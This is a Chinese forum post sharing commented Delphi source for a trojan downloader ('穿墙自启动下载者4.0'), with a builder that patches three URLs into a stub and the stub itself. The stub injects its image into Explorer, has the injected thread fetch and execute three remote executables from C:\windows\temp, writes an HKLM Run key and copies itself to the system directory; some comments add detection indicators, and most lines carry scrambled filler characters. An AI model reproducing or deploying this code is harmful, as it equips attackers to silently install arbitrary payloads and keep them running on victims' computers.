
[分享] 穿墙自启动下载者4.0 delphi源码详细注释

穿墙自启动下载者4.0 delphi源码详细注释

生成器
`& D$ J+ h$ Kunit Unit1;7 x3 B- r& h; |. ]
, x9 c7 f4 T! Y0 m, s
interface3 }# Q+ \( f& I7 U k( F( x' K
6 U& v7 ]! i7 A
uses' d( [1 V% n! y& ^" m- W1 r
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
/ i5 i' L% B9 @4 u. t; y% a. _9 CDialogs, StdCtrls, ExtCtrls; //调用的单元,
6 Z9 t7 |; H# _( N4 J t, k
+ W" ]0 B% A3 x7 P4 |8 H. v4 jconst
{ File offsets (decimal) of the three url/url2/url3 PChar slots inside the
  server.exe payload; Button1Click seeks to each one and overwrites 49 bytes
  (the 48-character NUL-padded URL plus its terminator). The block comment
  below describes how the author located them in the compiled server. }
) x* j- U% F( L& U0 Q- A% LOFFSET_URL = 29548; //file offset of download-URL slot 1
; b# i% Z6 P l2 Y+ g+ K, YOFFSET_URL2 = 29616; //file offset of download-URL slot 2
8 h) b% N; N3 ?OFFSET_URL3 = 29684; //file offset of download-URL slot 3
# l( h |- I$ B# ^3 ^* W) U$ C
6 r+ R2 H" P5 h' ?; m0 I& G2 B1 q5 A$ J. W0 s
{计算方法是用C32ASM打开编译得服务端即server.exe,搜索- m6 \ i. A2 h2 ~" y& ^2 A
server中
* \: ~6 r' N: e# |. W: @8 u( [var6 X4 ]4 c" U3 Y3 n( k i/ `
url: pchar =' ';
2 d- Z W& s* d! gurl2: pchar =' ';
& [3 ?; l9 M$ lurl3: pchar =' ';. I* z# @, ^& X9 o1 @) ~
三个变量得位置,搜索方法直接搜索一堆空格,就能找到,如果你怕找不好,可以把上面" E- D# g+ ?5 g/ u3 U9 \
pchar =' ';
) l' b) K. R+ a 里面换作pchar ='http:// ';# |- z1 a$ [7 c2 b8 ]; M
搜索http://即可,搜索到位置后,转换成10进制写在类似29548等的位置}
5 o) [3 h% ~. y3 p( O
- T4 w; S1 ^! j& Q& a/ j
7 T$ {9 r9 }' t% s
; o8 y) u" g' o2 b' B8 U+ e% {type
3 d5 @2 p: b3 M U3 N# d! @7 XTForm1 = class(TForm)
{ Generator form. Three edit boxes take the download URLs that Button1Click
  patches into the server.exe payload; Button2Click closes the form.
  Label captions are not visible in this listing. }
' P& m# ~0 J: ~4 z" f3 |( e Label1: TLabel;0 }, l/ E2 X4 j' j( C' [7 v5 w
// EdtUrl, Edit1 and Edit2 hold the first, second and third URL respectively
// (read as Url, Url2 and Url3 in Button1Click).
EdtUrl: TEdit;/ q" a6 z; I8 V5 `% e
// Button1 builds the server (Button1Click); Button2 closes the form (Button2Click).
Button1: TButton;
+ A, y$ v+ E5 k" j9 D8 Y2 n8 N Button2: TButton;9 I5 e' p v; ]* |7 I
Label3: TLabel;
?5 _- ~4 `1 Y. l$ C3 p) g Label4: TLabel;
, ], D2 i# t; _- } Edit1: TEdit;. K) F6 j3 ~" e8 z
Label5: TLabel;
6 c6 M# y3 S, ^7 b3 t Edit2: TEdit;
9 ~' Y/ X8 U. e4 H Label2: TLabel;- m: m1 y1 k0 S+ ?
Label7: TLabel;+ i; f6 m# Y- h' V1 ^+ d/ z+ X
procedure Button2Click(Sender: TObject);
. e; n7 c. X+ \' B. t2 i procedure Button1Click(Sender: TObject);
/ f. E8 B- B4 \' U* ?+ K2 W( f# J/ E" n# \/ @" U% e: X+ G! D$ w
private. s: k. h# \; R# a& V; r8 t
{ Private declarations }9 T: K9 R: u% j' T- x2 l1 H
public
, a' w2 J. @) d# n1 O" r { Public declarations }& T; S7 C8 ]2 z+ y7 l5 H S# \. q4 o
end;
: k+ e' q; O" }
' T4 ~) Z, g3 u& B2 q X0 }& b" Hvar: V7 S- e ^6 b! I
// Global instance of the generator form.
Form1: TForm1;% D/ x- ^, ?0 g G+ L

: a$ B' R, ]4 }* O. simplementation5 H, b- X0 r# D. _7 ~
$ d1 z- q* b/ m8 Y' b) v
{$R *.dfm}) i+ a# T& C3 Y- K# h9 b3 H
{上面一堆代码是DELPHI自动添加的,Var 是定义全局变量的位置,需要加啥自己加,如果不想修改就那么放着好了}6 G `8 T9 ]$ e2 c0 R8 `8 ]
$ g" i) A* l' I2 N8 l
procedure TForm1.Button2Click(Sender: TObject);( N6 B# R1 x j' `
// Closes the generator form.
begin% d8 \* ?$ f. o) W
close;
& f+ |9 k0 s* @end;! g6 h* U7 e' ^0 y
//pressing Button2 closes the form
8 q/ X f4 P" Nprocedure TForm1.Button1Click(Sender: TObject);
{ Builds a configured server executable.
  1. Refuses to run while the first URL box is empty, then asks for an output path.
  2. Writes the 'urlmm' RCDATA resource (presumably the embedded server.exe image,
     per the offset note above) to that path with CreateFile/WriteFile.
  3. Seeks to OFFSET_URL, OFFSET_URL2 and OFFSET_URL3 and overwrites each
     49-byte slot with the entered URL, NUL-padded to 48 characters plus terminator.
  Analysis note: the generated file carries the three URLs as plain NUL-padded
  strings at fixed file offsets, so they can be read straight out of a sample with
  a hex editor or a strings pass; the fixed offsets and the 'urlmm' resource name
  are static artifacts of this builder. }
. u: D3 M$ b8 U+ u5 v( K7 U: hvar/ a0 {; A3 m& ?: {$ D+ L
WriteBuff, ResultFilePath, ResourcePointer: PChar;
, F$ L* D' o$ ?6 ]7 T, D5 ?0 l4 j- SResourceLocation: HRSRC;8 N5 d! |6 H! R# v7 V
ResourceSize, BytesWritten: Longword;4 s9 X2 d5 f2 C$ n# m/ ^; K0 u
ResDataHandle: THandle;
1 I/ s% b) `7 a3 F8 B+ M3 O+ xFileHandle: THandle;2 y: Z% S) f# D( U0 c5 m X
sf:TSaveDialog;
1 s0 N9 i, X3 j' @/ l7 Z5 Q; IUrl,Url2,Url3:string; //these are the key variables and must be declared; nothing else needs changing
begin1 c: a4 v0 f& X7 A% }
if trim(EdtUrl.Text)='' then2 I! b0 y, L: y+ d& d9 p
begin
# k% n! U6 k4 j Application.MessageBox(pchar('请输入下载地址!'), '提示信息', mb_iconinformation);
/ w& b2 g& c( b% t$ ?; H exit;
9 K; R8 L# _- R8 mend;7 _/ N8 |. Y r
//prompt when the address is empty
. L: k5 Q) u9 I! O3 }; c# zsf :=TSaveDialog.Create(Application);
0 x1 X; ^ B$ t* j: _sf.DefaultExt :='exe';+ p3 P. A) h6 p! K
sf.Title :='生成';# Z* n4 \! l7 f- {8 w
if not sf.Execute then exit;% @: A4 U" _% M. O: V% F6 D* @: z
Url :=trim(EdtUrl.Text); //trim strips surrounding whitespace; takes the text typed in the edit box
1 g" q5 E. T* {Url2 :=trim(Edit1.Text); //same as above
% h0 H7 W1 d8 l7 I, P* WUrl3 :=trim(Edit2.Text); //same as above
ResultFilePath := pchar(sf.FileName);
0 K; g* v- H7 c) m! _/ cResourceLocation := FindResource(HInstance, 'urlmm', RT_RCDATA); //use the urlmm resource from the RCDATA resources
if ResourceLocation <> 0 then" {: ]0 B' [& W0 y1 s
begin
/ V& P3 K9 `' ~* H9 D ResourceSize := SizeofResource(HInstance, ResourceLocation);8 {) Z; v# O: F
if ResourceSize <> 0 then
; u( Y. c4 N ], ^) f4 u7 h begin
0 ?4 S- t1 Q1 J: ~9 l" M ResDataHandle := LoadResource(HInstance, ResourceLocation);! s$ _( o! ?% J7 V; T
if ResDataHandle <> 0 then* r3 A/ Y' \: Y
begin
$ `; i& S b2 T- ^6 ~ ResourcePointer := LockResource(ResDataHandle);6 F- H; x# V. E7 {% L" r
if ResourcePointer <> nil then
; I" H9 z" O2 [$ y3 r( y begin
! P( u' P P: b FileHandle := CreateFile(ResultFilePath, GENERIC_WRITE, FILE_SHARE_WRITE, nil, Create_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);& A u5 {$ a: E
if FileHandle <> INVALID_HANDLE_VALUE then
5 \. O* K5 l; Y" G t: [ begin( O9 N7 v+ u# v" H
// Dump the whole resource first, then patch the URL slots in place below.
WriteFile(FileHandle, ResourcePointer^, ResourceSize, BytesWritten, nil);
! Y. ]4 i3 [, z9 q Sleep(10);
3 F- w% H, R' K% z3 o; Q //watch the three sections below, the key part of writing at the offsets: 48 is the length, 49 is the terminated length; the slot is as long as your run of spaces
' l- l, E8_* i, G //the three sections write the 3 addresses
SetFilePointer(FileHandle, OFFSET_URL, nil, FILE_BEGIN);- t0 ~' x. e& T, G
WriteBuff := PChar(Url + StringOfChar(#0, 48 - Length(Url)));
5 S# u4 w- l; H WriteFile(FileHandle, WriteBuff^, 49, BytesWritten, nil);
+ j3 e3 y. k- u% G7 m/ g& i2 q& E# T7 ?2 G
SetFilePointer(FileHandle, OFFSET_URL2, nil, FILE_BEGIN);
. x0 G: B f1 @+ ? w+ F WriteBuff := PChar(Url2 + StringOfChar(#0, 48 - Length(Url2)));8 ^; C A: R- ]( Q I: l8 @
WriteFile(FileHandle, WriteBuff^, 49, BytesWritten, nil);, g Y. T) d8 C, }# m5 E

- `: s- w9 b- `: |. K; a2 q SetFilePointer(FileHandle, OFFSET_URL3, nil, FILE_BEGIN);
$ Q9 e# B3 `5 l WriteBuff := PChar(Url3 + StringOfChar(#0, 48 - Length(Url3)));
" D) t+ x3 Y1 ?6 Y. q0 ]' ^6 }; j WriteFile(FileHandle, WriteBuff^, 49, BytesWritten, nil);
+ J- G9 M2 H" w" L- f7 D* ^1 D0 R: t" M# Q# w

1 c! W5 x- c9 n) c; w# p- ? CloseHandle(FileHandle); //this must not be omitted
MessageBox(0, '配置文件成功', '提示', mb_iconinformation);; x! j9 P# N. b0 O+ M+ ^3 \1 {
end;
# T' Q& I4 N+ {2 w" u l- a: e end;/ G2 D: c$ ~/ s b( \
end;$ y! q; I: a- X2 C
end;
, h! ?5 J5 e6 w' X* B8 @end;9 Y& t) \: [ U7 ]6 c! e
end;
* }& j# @: Z# S4 e7 |. r/ ~6 n6 y: p: W2 d$ i

/ V0 j) t1 w4 D' ^program server;
+ A+ ]; e' W8 H, r9 m; V! h$ f/ ^8 e; } |( `
{$IMAGEBASE $13140000}
! C2 v; {$ A; E2 C+ d) M& Y2 k
$ Q9 E/ s, N0 V6 y! vuses. k1 y' M) f( b, A$ W
Windows,# N. [/ A3 q- p- e- D: I
SysUtils,3 P9 |% g# e' b
urlmon, //下载单元 ,这个改api减少体积不多( m. W, i) o, S
Registry; //注册表单元,这个可以改成api,会减少很多体积8 |5 @2 C. J: g" r. e" ^( ~
var! j( `9 J2 Q1 W& b1 E6 \+ W( Q
{ Three PChar slots initialised with spaces. The generator overwrites them in the
  compiled file at OFFSET_URL/OFFSET_URL2/OFFSET_URL3 with the download URLs.
  The generator's offset note says the originals hold a run of spaces; the page
  appears to show that padding collapsed to a single space. }
url: pchar =' '; //three slots, in order, reserved for the generator to write the download addresses into
# G8 k6 T7 X i0 g9 Y6 s url2: pchar =' ';8 [7 `8 H+ E, M/ L" y) E K
url3: pchar =' ';4 C! o$ ~7 O- v# [% ]
procedure Download; //download routine
{ Start routine of the thread that the main block creates in the remote process
  (CreateRemoteThread(..., @Download, ...)). Fetches url, url2 and url3 to three
  fixed paths under C:\windows\temp\ and runs each with WinExec.
  Detection note: the drop paths system.exe, system2.exe and system3.exe in
  C:\windows\temp, and URLDownloadToFile/WinExec activity attributed to the
  injected host process, are the observable artifacts of this routine. }
- u% U3 F2 b. D1 ]. Rbegin& Y, }3 ~* o7 J0 z- L
URLDownloadToFile(nil, url, 'C:\windows\temp\system.exe', 0, nil); //download the file
WinExec('C:\windows\temp\system.exe', SW_SHOW); //SW_SHOW or SW_HIDE //run the file; SW_SHOW runs it visibly, SW_HIDE runs it hidden
7 {. `; w9 A& @7 Q& v' l
URLDownloadToFile(nil, url2, 'C:\windows\temp\system2.exe', 0, nil);
4 Z5 F+ x; `8 k' FWinExec('C:\windows\temp\system2.exe', SW_SHOW); //SW_SHOW or SW_HIDE //author's note: WinExec could be replaced by a raw API call to reduce size
5 B2 i- I2 g3 v# e4 L o2 u9 w# [* ^" a" z0 K9 h
URLDownloadToFile(nil, url3, 'C:\windows\temp\system3.exe', 0, nil);9 G/ y7 I; i( S
WinExec('C:\windows\temp\system3.exe', SW_SHOW); //SW_SHOW or SW_HIDE7 P! S# N8 A( M6 V% q% m7 J
end;# W; G: _+ z6 Z

' v# X" G* c. M# V) |1 kvar
// hModule: base of this program's own image (GetModuleHandle(nil));
// hModule_News: the region VirtualAllocEx returns in the target process.
b( M& c4 a. r) W5 p' V5 Y- ]hModule, hModule_News: Pointer;
// Extent: SizeOfImage read from the PE optional header; Size: bytes-written
// out-parameter of WriteProcessMemory; ThreadId: out-parameter of CreateRemoteThread.
8 S% Q. ~* ~9 o, [Extent, Size, ThreadId: longword;' l* F+ Y3 o8 g2 T
// ProcessHandle/Pid: the process that owns the Shell_TrayWnd window (Explorer).
ProcessHandle, Pid: longword;4 J v) g8 T: v7 M/ ]) w- U, \
// reg: used to write the Run key; sysdir: receives the GetSystemDirectory result.
reg:TRegistry;0 K- s1 u9 l. e
sysdir:array[0..50] of char;5 t4 R9 l+ D' {* O+ `& {

; _/ a- @+ b; q! xbegin- R. c% z. Y1 ?! F% w
// Main program, two phases.
// Phase 1 (through the "explorer.exe" note below): finds the process that owns the
// Shell_TrayWnd window, frees and re-allocates a region at this program's own image
// base inside it (presumably why the IMAGEBASE $13140000 directive pins that base at
// the top of the file), copies the whole image over with WriteProcessMemory and
// starts a thread at Download there. The URLDownloadToFile/WinExec calls in
// Download are therefore made by that host process, not by this executable.
// Phase 2: persistence. Writes value 'system' with data 'intenat.exe' under
// HKLM\Software\Microsoft\Windows\CurrentVersion\Run and copies itself to
// <system directory>\intenat.exe if it is not already there.
// Detection notes: cross-process VirtualFreeEx/VirtualAllocEx/WriteProcessMemory/
// CreateRemoteThread targeting the shell process, a new HKLM Run value named
// 'system', and a new intenat.exe in the system directory are the artifacts to
// alert on; the non-default image base is a static indicator in the file itself.
GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);# n4 }6 Y; N& H g' m& Z7 \3 D
//get the PID of the Explorer process; Shell_TrayWnd is the window class name (the author notes Spy++ was used to look such names up)
$ ?# x X2 X0 I" Q' t. S
; {* |6 m i$ R7 PProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, Pid); //open the process
0 $ ?5 b3 L( k) g6 d& g" W y/ ~
hModule := Pointer(GetModuleHandle(nil));
2 A3 A6 s4 t7 _9 ~6 A//the value obtained here is a pointer whose target holds the base address and length of this program's own image
( H7 w) T/ M: `5 a; h" ?( o3 M0 D1 T
Extent := PImageOptionalHeader(Pointer(integer(hModule) +PImageDosHeader(hModule)._lfanew + SizeOf(dword) +SizeOf(TImageFileHeader))).SizeOfImage;
1 j0 ~% g# ?9 k; j! i( j; `& p//get the length of the in-memory image
9 F, g4 V6 w7 ]6 Z
( k u/ c! t/ b" J2 zVirtualFreeEx(ProcessHandle, hModule, 0, MEM_RELEASE);" f5 L0 [, I0 d' k
//allocate a sufficiently large memory region inside the Explorer process

1 y8 t/ o6 ?. R) ]* lhModule_News := VirtualAllocEx(ProcessHandle, hModule, Extent, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);8 c7 Z$ a5 N& u! k5 v
//fix the starting base address and the position of the memory image base

8 V; J8 l2 d, R2 }" x5 ~' z: AWriteProcessMemory(ProcessHandle, hModule_News, hModule, Extent, Size);8 n- N% k/ }* ?! I" U
//with the values above determined, the operation starts here
4 |: [4 P( N8 _' _- J( ` Z9 q( p$ e2 h3 P9 H7 @4 S6 h* M4 @* \& H
CreateRemoteThread(ProcessHandle, nil, 0, @Download, hModule, 0, ThreadId);- k/ f: V9 d1 g' x6 H. o
//create the remote thread; the injection is complete at this point

]' U& ^2 `: I# M6 w# P& ~CloseHandle(ProcessHandle);
. \2 D2 P% @& e( O+ w# b//close the handle
6 d( T: i) c) N7 H
{ the code above injects into the explorer.exe process }; `) a& V* i5 b, ]
begin5 c5 z( x2 K* h( a$ {6 ?) t3 S
Reg := TRegistry.Create;
/ M/ m2 [: v3 M' j3 ^5 N0 v( G( eTry0 T8 h' t- b" G7 A/ B$ B* {) k
Reg.RootKey := HKEY_LOCAL_MACHINE;! `" Z1 d! p+ I8 i% k5 U1 j3 A
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run', True);
% a, p1 w! x5 t& v: e Reg.WriteString('system', 'intenat.exe'); //write the value
Reg.CloseKey;
% y% \& j' N* P S% n. aFinally
$ n# ? ?0 M3 \& @5 s) C" C Reg.Free;0 z8 j) L6 `" D* W
End;
0 s9 ^: P3 N8 R" ^( C//the above is the registry-writing code
GetSystemDirectory(sysdir,50); //get the system directory into sysdir; GetWindowsDirectory would return the Windows directory instead
if not FileExists(sysdir+'\intenat.exe') then //run only if intenat.exe does not yet exist in the system directory
5 t4 y% v5 j2 @7 [ copyfile(pchar(paramstr(0)),pchar(sysdir+'\intenat.exe'),true); //copy itself into the system directory under the name intenat.exe
8 H6 D" I% t* [# z. D& H. d
end; r$ O: `1 z3 s1 b
end.2 f/ C0 q$ ]9 t F
' f" O- z2 B! M8 p. f; j
% z# s* {+ S; @! R: N8 [0 F9 d
end.
